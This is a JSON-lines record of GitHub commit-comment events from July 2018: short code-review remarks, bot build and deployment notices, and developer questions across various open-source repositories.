{"id":"7923534388","type":"CommitCommentEvent","actor":{"login":"felixdausch"},"repo":{"name":"plentymarkets/plugin-ceres"},"payload":{"comment":{"id":29607303,"position":null,"line":null,"path":null,"commit_id":"2c611360df8358b3852d914e4639d7d4f1d4f8e3","created_at":"2018-07-05T14:20:12Z","updated_at":"2018-07-05T14:20:12Z","author_association":"CONTRIBUTOR","body":"Da hat sich ein Tippfehler eingeschlichen. Dieser wurde allerdings direkt behoben:\r\nhttps://github.com/plentymarkets/plugin-ceres/commit/d21b4f66adf6906b3dbadffbf7dff516285037b6#diff-bcdec24f389afcd446f3957d7ecbab5d"}},"created_at":"2018-07-05T14:20:12Z"}
{"id":"7923535132","type":"CommitCommentEvent","actor":{"login":"tobilg"},"repo":{"name":"Yadasko/api2html"},"payload":{"comment":{"id":29607309,"position":null,"line":null,"path":null,"commit_id":"0ef8078ed6f53c87b89616075ac18d9bfd0c2b3f","created_at":"2018-07-05T14:20:18Z","updated_at":"2018-07-05T14:20:18Z","author_association":"NONE","body":"Thanks for forking api2html? Would you consider to create a PR for this change? Thanks in advance!"}},"created_at":"2018-07-05T14:20:18Z"}
{"id":"7923542812","type":"CommitCommentEvent","actor":{"login":"afabri"},"repo":{"name":"CGAL/cgal-public-dev"},"payload":{"comment":{"id":29607335,"position":14,"line":126,"path":"Heat_method_3/include/CGAL/Heat_method_3/Intrinsic_Delaunay_Triangulation_3.h","commit_id":"00dced3be40878c66e062ef5222f38832ff0cb47","created_at":"2018-07-05T14:21:31Z","updated_at":"2018-07-05T14:21:31Z","author_association":"MEMBER","body":"Note that here you make yet another copy of  the triangle mesh. Not sure that this is intended."}},"created_at":"2018-07-05T14:21:31Z"}
{"id":"7923546147","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"serdar1980/spring"},"payload":{"comment":{"id":29607340,"position":18,"line":18,"path":"quiz/src/main/java/ru/serdar1980/domain/Question.java","commit_id":"b35c9975725980d032e4237b7fe1b56c041be187","created_at":"2018-07-05T14:22:02Z","updated_at":"2018-07-05T14:22:02Z","author_association":"NONE","body":"Не уверен, что нужен сеттер."}},"created_at":"2018-07-05T14:22:02Z"}
{"id":"7923550017","type":"CommitCommentEvent","actor":{"login":"tobilg"},"repo":{"name":"thomasruiz/api2html"},"payload":{"comment":{"id":29607351,"position":null,"line":null,"path":null,"commit_id":"c9a4dc1c5d1803441432a099733e4828c49424eb","created_at":"2018-07-05T14:22:40Z","updated_at":"2018-07-05T14:22:40Z","author_association":"NONE","body":"Thanks for forking api2html! Would you consider to create a PR for this change? Thanks in advance!"}},"created_at":"2018-07-05T14:22:40Z"}
{"id":"7923550336","type":"CommitCommentEvent","actor":{"login":"danieleteti"},"repo":{"name":"humrochagf/revelation"},"payload":{"comment":{"id":29607352,"position":null,"line":null,"path":null,"commit_id":"d2ba3b954edf3d1f4715358a53c75d7af9da438c","created_at":"2018-07-05T14:22:43Z","updated_at":"2018-07-05T14:22:43Z","author_association":"CONTRIBUTOR","body":"Great!"}},"created_at":"2018-07-05T14:22:43Z"}
{"id":"7923551472","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29607356,"position":null,"line":null,"path":null,"commit_id":"a28c58feb18f49a7b599fce819fc437b39bddcee","created_at":"2018-07-05T14:22:54Z","updated_at":"2018-07-05T14:22:54Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/sso-users-arent-automatically-added-to-email-domain-based-groups/66980/9\n"}},"created_at":"2018-07-05T14:22:54Z"}
{"id":"7923551801","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"serdar1980/spring"},"payload":{"comment":{"id":29607357,"position":10,"line":10,"path":"quiz/src/main/java/ru/serdar1980/domain/Quiz.java","commit_id":"b35c9975725980d032e4237b7fe1b56c041be187","created_at":"2018-07-05T14:22:57Z","updated_at":"2018-07-05T14:22:57Z","author_association":"NONE","body":"private"}},"created_at":"2018-07-05T14:22:57Z"}
{"id":"7923552370","type":"CommitCommentEvent","actor":{"login":"tobilg"},"repo":{"name":"lukseven/api2html"},"payload":{"comment":{"id":29607358,"position":null,"line":null,"path":null,"commit_id":"817e2de7be044fe098cd0a60533bbc0dcdf42694","created_at":"2018-07-05T14:23:03Z","updated_at":"2018-07-05T14:23:03Z","author_association":"NONE","body":"Thanks for forking api2html! Would you consider to create a PR for this change? Thanks in advance!"}},"created_at":"2018-07-05T14:23:03Z"}
{"id":"7923553525","type":"CommitCommentEvent","actor":{"login":"ramadv1"},"repo":{"name":"ramadv1/Printernet"},"payload":{"comment":{"id":29607362,"position":null,"line":null,"path":null,"commit_id":"f87d877ef8ac97787395a783f9b316c2b20cd823","created_at":"2018-07-05T14:23:14Z","updated_at":"2018-07-05T14:23:14Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/40737375/42328852-50cc0374-803d-11e8-9b85-9a2b2cae6e22.png)\r\n\r\nClick the link to the Printernet repository from the project map!\r\nhttps://www.plectica.com/maps/4RURO8KIX"}},"created_at":"2018-07-05T14:23:14Z"}
{"id":"7923553758","type":"CommitCommentEvent","actor":{"login":"andygeers"},"repo":{"name":"UsAndRufus/prayermate_api"},"payload":{"comment":{"id":29607363,"position":23,"line":100,"path":"lib/prayermate_api.rb","commit_id":"4f21b65323c17d724b0b8003e18e3a52bb1683b2","created_at":"2018-07-05T14:23:17Z","updated_at":"2018-07-05T14:23:17Z","author_association":"COLLABORATOR","body":"This actually makes no different - when using the { : } syntax it always converts it to a symbol. If you want \"errors\" to be a string you need to use the { \"errors\" => } syntax"}},"created_at":"2018-07-05T14:23:17Z"}
{"id":"7923553909","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29607364,"position":null,"line":null,"path":null,"commit_id":"2118c214cb5b0649fd2813ed09916d442c46ecf0","created_at":"2018-07-05T14:23:18Z","updated_at":"2018-07-05T14:23:18Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[2] Úprava reportu ubytování](https://trello.com/c/Hj7LuMzA/645-2-%C3%BAprava-reportu-ubytov%C3%A1n%C3%AD)"}},"created_at":"2018-07-05T14:23:18Z"}
{"id":"7923556167","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"serdar1980/spring"},"payload":{"comment":{"id":29607371,"position":12,"line":12,"path":"quiz/src/main/java/ru/serdar1980/domain/Student.java","commit_id":"b35c9975725980d032e4237b7fe1b56c041be187","created_at":"2018-07-05T14:23:39Z","updated_at":"2018-07-05T14:23:39Z","author_association":"NONE","body":"private везде."}},"created_at":"2018-07-05T14:23:39Z"}
{"id":"7923557107","type":"CommitCommentEvent","actor":{"login":"chris-stg"},"repo":{"name":"chris-stg/mod-gift-guide"},"payload":{"comment":{"id":29607372,"position":null,"line":null,"path":null,"commit_id":"e28f8ffc07c5d66dba0bda94f27cdd6491cee450","created_at":"2018-07-05T14:23:48Z","updated_at":"2018-07-05T14:23:48Z","author_association":"OWNER","body":"Created multidev environment [mod-gift-guide#ci-40](https://dashboard.pantheon.io/sites/72035e91-bbeb-4fea-aa37-97b7ccd79d43#ci-40).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-40-mod-gift-guide.pantheonsite.io/)"}},"created_at":"2018-07-05T14:23:48Z"}
{"id":"7923559085","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"serdar1980/spring"},"payload":{"comment":{"id":29607381,"position":10,"line":10,"path":"quiz/src/main/java/ru/serdar1980/domain/Student.java","commit_id":"b35c9975725980d032e4237b7fe1b56c041be187","created_at":"2018-07-05T14:24:08Z","updated_at":"2018-07-05T14:24:08Z","author_association":"NONE","body":"А это точно нужно? Студент по идее один."}},"created_at":"2018-07-05T14:24:08Z"}
{"id":"7923587557","type":"CommitCommentEvent","actor":{"login":"TPReal"},"repo":{"name":"ReactiveX/rxjs"},"payload":{"comment":{"id":29607451,"position":34,"line":148,"path":"src/internal/testing/TestScheduler.ts","commit_id":"2d5b3b284f6520c130f2dc0d8928fe4d7db9ee46","created_at":"2018-07-05T14:28:35Z","updated_at":"2018-07-05T14:28:35Z","author_association":"NONE","body":"Thank you, reported as https://github.com/ReactiveX/rxjs/issues/3898."}},"created_at":"2018-07-05T14:28:35Z"}
{"id":"7923587752","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"serdar1980/spring"},"payload":{"comment":{"id":29607452,"position":19,"line":19,"path":"quiz/src/main/java/ru/serdar1980/service/RandomQuestionGeneratorService.java","commit_id":"b35c9975725980d032e4237b7fe1b56c041be187","created_at":"2018-07-05T14:28:37Z","updated_at":"2018-07-05T14:28:37Z","author_association":"NONE","body":"И это тоже отличный параметр конструктора"}},"created_at":"2018-07-05T14:28:37Z"}
{"id":"7923594207","type":"CommitCommentEvent","actor":{"login":"fperezromero"},"repo":{"name":"fperezromero/udemy-heroes-2"},"payload":{"comment":{"id":29607473,"position":null,"line":null,"path":null,"commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-05T14:29:40Z","updated_at":"2018-07-05T14:29:40Z","author_association":"OWNER","body":"# Notas\r\nEntiendo porque agregaste a Deadshot, lo necesitaremos"}},"created_at":"2018-07-05T14:29:40Z"}
{"id":"7923611656","type":"CommitCommentEvent","actor":{"login":"SimonVrouwe"},"repo":{"name":"ElementsProject/lightning"},"payload":{"comment":{"id":29607512,"position":null,"line":null,"path":null,"commit_id":"fe405f49beba3686d324aae0e46ec61e77e9621c","created_at":"2018-07-05T14:32:27Z","updated_at":"2018-07-05T14:32:27Z","author_association":"NONE","body":"Not sure if I completely understand what you mean with\r\n\r\n> Implements an EWMA for the fee estimation. Achieves 90% influence of the newer\r\nfee after 5 minutes, and adjusts to the polling rate that is configured.\r\n\r\nor that I just don't understand the code, but I think \r\n`double change_rate = (double)topo->poll_seconds / 150 * 0.9;` \r\nshould become\r\n`double change_rate = pow(0.1,(double)topo->poll_seconds / 300);`\r\n\r\nIf you apply such smoothing factor `alpha = 1 - change_rate` to a step function then after 300s it has reached 0.9*step-height for every polling interval. In chart below, the thick blue line is the step function that represent real values. The other lines are smoothed values, using pandas `ewm().mean()` function, for series with different polling intervals and using above value for `alpha`. I think that is what you want.\r\n![exp_smoothing](https://user-images.githubusercontent.com/3152756/42328315-93fa388a-8076-11e8-9777-68e17900cefb.png)\r\n\r\nIf you are interested I can give the derivation."}},"created_at":"2018-07-05T14:32:27Z"}
{"id":"7923619781","type":"CommitCommentEvent","actor":{"login":"Snow-Pyon"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29607521,"position":80,"line":80,"path":"src/main/java/ch/njol/skript/expressions/ExprIndexes.java","commit_id":"1c6c80eae6db0b00230385dfc4dd4a25180790c5","created_at":"2018-07-05T14:33:45Z","updated_at":"2018-07-05T14:33:45Z","author_association":"MEMBER","body":"I'd prefer the usage of String#format for readability's sake, I mean, there are some expressions that their toString's is literally unreadable code-wise. As for performance, the difference should be negligible so I don't see why not."}},"created_at":"2018-07-05T14:33:45Z"}
{"id":"7923621607","type":"CommitCommentEvent","actor":{"login":"tniebergall"},"repo":{"name":"e3n-internetagentur/magento-1"},"payload":{"comment":{"id":29607523,"position":4,"line":140,"path":"app/design/frontend/base/default/layout/payone/core.xml","commit_id":"49afb4a19cde6c66159cbe55d60396720c3bc27c","created_at":"2018-07-05T14:34:02Z","updated_at":"2018-07-05T14:34:02Z","author_association":"MEMBER","body":"@arosiek maybe it could be a good idear to add an \"ifconfig\" condition to load the js only if payolution is enabled and used."}},"created_at":"2018-07-05T14:34:02Z"}
{"id":"7923624188","type":"CommitCommentEvent","actor":{"login":"luomai"},"repo":{"name":"tensorlayer/tensorlayer"},"payload":{"comment":{"id":29607531,"position":null,"line":null,"path":null,"commit_id":"ba23b646979bdb62f3df20fcdfb4c30b22669a29","created_at":"2018-07-05T14:34:26Z","updated_at":"2018-07-05T14:34:26Z","author_association":"MEMBER","body":"Does this commit resolve the RTD and CI problem? @lgarithm "}},"created_at":"2018-07-05T14:34:26Z"}
{"id":"7923624849","type":"CommitCommentEvent","actor":{"login":"doodledaisy93"},"repo":{"name":"doodledaisy93/C-language-demo"},"payload":{"comment":{"id":29607537,"position":null,"line":null,"path":null,"commit_id":"ba150b2eda5b67a43230d5481aa8c099c57284ee","created_at":"2018-07-05T14:34:33Z","updated_at":"2018-07-05T14:34:33Z","author_association":"OWNER","body":"判断语句"}},"created_at":"2018-07-05T14:34:33Z"}
{"id":"7923625464","type":"CommitCommentEvent","actor":{"login":"sfan02"},"repo":{"name":"USEPA/EPA_Express_Code"},"payload":{"comment":{"id":29607539,"position":null,"line":null,"path":null,"commit_id":"fd4d88e5cafe2b20df7ff8fe3fb3e8c4b590bb87","created_at":"2018-07-05T14:34:39Z","updated_at":"2018-07-05T14:34:39Z","author_association":"CONTRIBUTOR","body":"Added TSP. Updated lean."}},"created_at":"2018-07-05T14:34:39Z"}
{"id":"7923631077","type":"CommitCommentEvent","actor":{"login":"AR98"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29607556,"position":5,"line":71,"path":"app/src/main/java/com/example/android/miwok/WordAdapter.java","commit_id":"b1c2ccba98a58f77d332529c07d95ccfba083224","created_at":"2018-07-05T14:35:33Z","updated_at":"2018-07-05T14:35:33Z","author_association":"NONE","body":"My app is not working can u help me ? ...my app just show main activity when I clicked number color...and so on....my app stopped.....nothing is visible"}},"created_at":"2018-07-05T14:35:33Z"}
{"id":"7923632146","type":"CommitCommentEvent","actor":{"login":"UsAndRufus"},"repo":{"name":"UsAndRufus/prayermate_api"},"payload":{"comment":{"id":29607559,"position":23,"line":100,"path":"lib/prayermate_api.rb","commit_id":"4f21b65323c17d724b0b8003e18e3a52bb1683b2","created_at":"2018-07-05T14:35:44Z","updated_at":"2018-07-05T14:35:44Z","author_association":"OWNER","body":"Ah good spot"}},"created_at":"2018-07-05T14:35:44Z"}
{"id":"7923634406","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/linux-modder.github.io"},"payload":{"comment":{"id":29607562,"position":null,"line":null,"path":null,"commit_id":"3bb4a21ca161c61c68702d47bc5c236f7076681c","created_at":"2018-07-05T14:36:06Z","updated_at":"2018-07-05T14:36:06Z","author_association":"OWNER","body":"\r\nSeeing light matter dark Antimatter b quark engine development relating to models and telescopic scalar OPS"}},"created_at":"2018-07-05T14:36:06Z"}
{"id":"7923634536","type":"CommitCommentEvent","actor":{"login":"bralexc"},"repo":{"name":"jslater89/pendulum"},"payload":{"comment":{"id":29607565,"position":null,"line":null,"path":null,"commit_id":"7f7d0bdd7099711e75f1bb2f2ad3cc78fa87e7ec","created_at":"2018-07-05T14:36:07Z","updated_at":"2018-07-05T14:36:07Z","author_association":"NONE","body":"Hey there. Don't want to open an Issue and couldn't find another way to contact you, therefore the message here.\r\n\r\nI saw your blog posts regarding the EMC testings. I work for a company that does electromagnetic high frequency simulations and EMC virtual testings is one of the applications. If you're interested, I could ask the guy here if he could run that on his spare time. This way at least you'd do the lab testing only once you know the board will be approved.\r\n\r\nLet me know what you think. My email is <name.lastname> @ gmail.\r\n\r\nCheers."}},"created_at":"2018-07-05T14:36:07Z"}
{"id":"7923640810","type":"CommitCommentEvent","actor":{"login":"hhristov-tsd"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29607577,"position":28,"line":192,"path":"Gravity/Gravity/Base/BaseDto.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-05T14:37:08Z","updated_at":"2018-07-05T14:37:08Z","author_association":"COLLABORATOR","body":"Replaced whole block with GetParentArtifactIdProperty."}},"created_at":"2018-07-05T14:37:08Z"}
{"id":"7923643481","type":"CommitCommentEvent","actor":{"login":"hhristov-tsd"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29607585,"position":32,"line":196,"path":"Gravity/Gravity/Base/BaseDto.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-05T14:37:34Z","updated_at":"2018-07-05T14:37:34Z","author_association":"COLLABORATOR","body":"Good point. Added similar logic and will commit it soon."}},"created_at":"2018-07-05T14:37:34Z"}
{"id":"7923643813","type":"CommitCommentEvent","actor":{"login":"pellmann"},"repo":{"name":"eclipse/hono"},"payload":{"comment":{"id":29607587,"position":53,"line":80,"path":"service-base/src/main/java/org/eclipse/hono/service/command/CommandConnectionImpl.java","commit_id":"ebf7193cd708710c459c0345537bc264274d0df2","created_at":"2018-07-05T14:37:38Z","updated_at":"2018-07-05T14:37:38Z","author_association":"CONTRIBUTOR","body":"You mean something like this?\r\n\r\n```\r\n        if (messageConsumer != null) {\r\n            final Future<MessageConsumer> result = Future.future();\r\n            result.complete(messageConsumer);\r\n            return result;\r\n        } \r\n```"}},"created_at":"2018-07-05T14:37:38Z"}
{"id":"7923654783","type":"CommitCommentEvent","actor":{"login":"SimonVrouwe"},"repo":{"name":"ElementsProject/lightning"},"payload":{"comment":{"id":29607605,"position":null,"line":null,"path":null,"commit_id":"fe405f49beba3686d324aae0e46ec61e77e9621c","created_at":"2018-07-05T14:39:26Z","updated_at":"2018-07-05T14:39:26Z","author_association":"NONE","body":"I also get I lot of `...feerate X hit floor Y` where `Y > 253` messages in the log file.\r\n\r\n"}},"created_at":"2018-07-05T14:39:26Z"}
{"id":"7923659466","type":"CommitCommentEvent","actor":{"login":"IfcOpenBot"},"repo":{"name":"IfcOpenBot/IfcOpenShell"},"payload":{"comment":{"id":29607615,"position":null,"line":null,"path":null,"commit_id":"6fdd2049a2a62e754009e2c5089a04804f1e9078","created_at":"2018-07-05T14:40:10Z","updated_at":"2018-07-05T14:40:10Z","author_association":"OWNER","body":"Hi,\n\nI've created the following builds for your commit:\n\n| |Linux|macOS|\n|---|---|---|\n|Blender py36| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-macos64.zip)|\n|IfcConvert| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-macos64.zip)|\n|IfcGeomServer| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-macos64.zip)|\n|Python 27| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-macos64.zip)|\n|Python 27u| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-macos64.zip)|\n|Python 32| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-macos64.zip)|\n|Python 32u| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-macos64.zip)|\n|Python 33| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-macos64.zip)|\n|Python 34| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-macos64.zip)|\n|Python 35| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-macos64.zip)|\n|Python 36| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-macos64.zip)|\n\nKind regards,\nIfcOpenBot\n"}},"created_at":"2018-07-05T14:40:10Z"}
{"id":"7923666128","type":"CommitCommentEvent","actor":{"login":"elwazana"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29607629,"position":null,"line":null,"path":null,"commit_id":"c3654874044223057570967df051e04ee9e5d95b","created_at":"2018-07-05T14:41:11Z","updated_at":"2018-07-05T14:41:11Z","author_association":"COLLABORATOR","body":"@szymczdm Hello Dan, I was looking over the descriptions and I noticed that some of them don't seem to be missing information,  but I wanted them to get double checked by you in-case I'm missing something. They are in lines:\r\n \r\n- 708\r\n- 890\r\n- 922\r\n- 955\r\n- 984\r\n- 1011\r\n- 1038\r\n- 1064\r\n- 1091\r\n- 1118\r\n- 1172\r\n- 1200\r\n- 1249\r\n- 1297\r\n- 1332\r\n- 1418\r\n- 1448\r\n- 1484\r\n- 1515\r\n- 1540\r\n\r\nI compared them to the removed Descriptions either above/below them and they have the same information exactly just in listed form instead of as a paragraph. \r\n\r\nThere also seems to be a duplication error in lines:\r\n- 1119-1120\r\n- 1146-1147"}},"created_at":"2018-07-05T14:41:11Z"}
{"id":"7923666581","type":"CommitCommentEvent","actor":{"login":"shaunsmith"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29607630,"position":11,"line":8,"path":"docs/developers/fn-file.md","commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-05T14:41:15Z","updated_at":"2018-07-05T14:41:15Z","author_association":"MEMBER","body":"The name `v` does not communicate its purpose at all.   Does it mean func.yaml format version or api-version--are they the same thing or do they vary independently?   \r\n\r\nAs was pointed out in Slack by Leonardo Zanivan, if we add a func.yaml format version field to the file we can get the same benefit of version detection as we can from a rename. "}},"created_at":"2018-07-05T14:41:15Z"}
{"id":"7923667030","type":"CommitCommentEvent","actor":{"login":"Kisty"},"repo":{"name":"jgilfelt/android-sqlite-asset-helper"},"payload":{"comment":{"id":29607634,"position":null,"line":null,"path":null,"commit_id":"74a9b0d68aeb1bb0b9778c5598e37da573919ce1","created_at":"2018-07-05T14:41:19Z","updated_at":"2018-07-05T14:41:19Z","author_association":"NONE","body":"I remember hearing @ranaparamveer was going to maintain the library on his fork. Is that correct? https://github.com/ranaparamveer/android-sqlite-asset-helper/"}},"created_at":"2018-07-05T14:41:19Z"}
{"id":"7923668216","type":"CommitCommentEvent","actor":{"login":"boffbowsh"},"repo":{"name":"alphagov/gds-way"},"payload":{"comment":{"id":29607638,"position":11,"line":16,"path":"source/standards/configuration-management.html.md.erb","commit_id":"0b600f8c7a10e0535ea3298891f5f20edf241a1d","created_at":"2018-07-05T14:41:30Z","updated_at":"2018-07-05T14:41:30Z","author_association":"MEMBER","body":"This is the opposite to what I said.\r\n\r\nOriginal:\r\n> If your environment consists of a simple deployment artefact like an [Amazon Machine Image (AMI)][], Puppet may not be necessary"}},"created_at":"2018-07-05T14:41:30Z"}
{"id":"7923669050","type":"CommitCommentEvent","actor":{"login":"ChillerDragon"},"repo":{"name":"ddnet/ddnet-web"},"payload":{"comment":{"id":29607640,"position":null,"line":null,"path":null,"commit_id":"5b3ff5ef35e7f5293fe40b3582461a91f987ad2c","created_at":"2018-07-05T14:41:38Z","updated_at":"2018-07-05T14:41:38Z","author_association":"CONTRIBUTOR","body":"not cool"}},"created_at":"2018-07-05T14:41:38Z"}
{"id":"7923669470","type":"CommitCommentEvent","actor":{"login":"Hygtest"},"repo":{"name":"Hygtest/rep2018"},"payload":{"comment":{"id":29607641,"position":null,"line":null,"path":null,"commit_id":"bda464fe986e4da019dea029ce7edf91b32bbdb7","created_at":"2018-07-05T14:41:41Z","updated_at":"2018-07-05T14:41:41Z","author_association":"OWNER","body":"PR3-2 sefwefwef"}},"created_at":"2018-07-05T14:41:41Z"}
{"id":"7923671865","type":"CommitCommentEvent","actor":{"login":"Devoxin"},"repo":{"name":"Terminal/terminal.ink"},"payload":{"comment":{"id":29607649,"position":null,"line":null,"path":null,"commit_id":"604a49720a24e32da1ebf52304fbc423724e379b","created_at":"2018-07-05T14:42:03Z","updated_at":"2018-07-05T14:42:03Z","author_association":"NONE","body":"Rip"}},"created_at":"2018-07-05T14:42:03Z"}
{"id":"7923674564","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29607655,"position":null,"line":null,"path":null,"commit_id":"d7ac5474dd0582be35e2290d95f5fe610aee2963","created_at":"2018-07-05T14:42:29Z","updated_at":"2018-07-05T14:42:29Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/jenkins-device-tests/5/display/redirect) (on internal Jenkins) failed in stage 'Publish builds to GitHub' 🔥 : java.lang.Exception: Skipping the rest for now\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/jenkins-device-tests/5//console)\n"}},"created_at":"2018-07-05T14:42:29Z"}
{"id":"7923675242","type":"CommitCommentEvent","actor":{"login":"hhristov-tsd"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29607656,"position":38,"line":38,"path":"Gravity/Gravity/DAL/SQL/SqlDao.Get.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-05T14:42:35Z","updated_at":"2018-07-05T14:42:35Z","author_association":"COLLABORATOR","body":"implemented with ToDictionary"}},"created_at":"2018-07-05T14:42:35Z"}
{"id":"7923676761","type":"CommitCommentEvent","actor":{"login":"timdurniak"},"repo":{"name":"timdurniak/sample-cloud-native-toolchain-tutorial-20180705133416327"},"payload":{"comment":{"id":29607659,"position":null,"line":null,"path":null,"commit_id":"62d8dfbd516e40d5a79a1f5cc14743357ad639e8","created_at":"2018-07-05T14:42:50Z","updated_at":"2018-07-05T14:42:50Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/67732414-1ba4-4b03-b3cf-4cbc317bf563?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180705133416327\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/9a6a6061-dc0a-477a-b0ed-0a1889a5e3b7?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180705133416327\") deployed [sample-cloud-native-toolchain-tutorial-20180705133416327](https://github.com/timdurniak/sample-cloud-native-toolchain-tutorial-20180705133416327/releases/tag/deploy-ibm-yp-us-south-tdurniak-us.ibm.com-test-20180705-144249 \"deploy-ibm-yp-us-south-tdurniak-us.ibm.com-test-20180705-144249\") to [test](https://console.bluemix.net/apps/1d569e56-50fc-4de5-921b-0fcb74235d85?env_id=ibm:yp:us-south \"ibm:yp:us-south:tdurniak@us.ibm.com:test\"), including this commit"}},"created_at":"2018-07-05T14:42:50Z"}
{"id":"7923677261","type":"CommitCommentEvent","actor":{"login":"akervern"},"repo":{"name":"nuxeo/doc.nuxeo.com-content"},"payload":{"comment":{"id":29607660,"position":125,"line":231,"path":"src/nxdoc/nuxeo-server/upgrading-the-nuxeo-platform/upgrade-from-lts-2017-following-fast-tracks.md","commit_id":"6b89b8c5686214d6a2c83e9c881389f22da08af8","created_at":"2018-07-05T14:42:55Z","updated_at":"2018-07-05T14:42:55Z","author_association":"MEMBER","body":"That one could be removed, it is not related to an upgrade note but more in a release note, because it is something new."}},"created_at":"2018-07-05T14:42:55Z"}
